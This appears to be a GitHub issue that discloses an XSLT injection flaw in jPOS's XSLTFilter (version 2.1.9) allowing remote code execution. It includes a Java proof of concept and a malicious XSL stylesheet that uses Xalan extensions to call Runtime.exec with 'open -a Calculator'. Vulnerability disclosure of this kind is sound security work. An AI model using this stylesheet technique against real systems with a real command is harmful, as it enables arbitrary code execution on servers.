Open c1gar opened 2 months ago
In the org.jpos.iso.filter.XSLTFilter.java file, there is a functionality for XSL transformation without setting secure parameters, which poses a risk of Remote Code Execution (RCE). It is recommended to add secure parameters. maven
<!-- https://mvnrepository.com/artifact/org.jpos/jpos --> <dependency> <groupId>org.jpos</groupId> <artifactId>jpos</artifactId> <version>2.1.9</version> </dependency>
POC.java
import org.jpos.iso.ISOChannel; import org.jpos.iso.ISOException; import org.jpos.iso.ISOMsg; import org.jpos.iso.filter.XSLTFilter; import org.jpos.util.LogEvent; public class jposTest { public static void main(String[] args) throws ISOException { ISOChannel channel = new CustomISOChannel(); ISOMsg m = new ISOMsg(); LogEvent evt = new LogEvent(); XSLTFilter xsltFilter = new XSLTFilter("poc.xsl",true); xsltFilter.filter(channel,m,evt); } }
poc.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,'open -a Calculator')"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet>
In the org.jpos.iso.filter.XSLTFilter.java file, there is a functionality for XSL transformation without setting secure parameters, which poses a risk of Remote Code Execution (RCE). It is recommended to add secure parameters. maven
POC.java
poc.xsl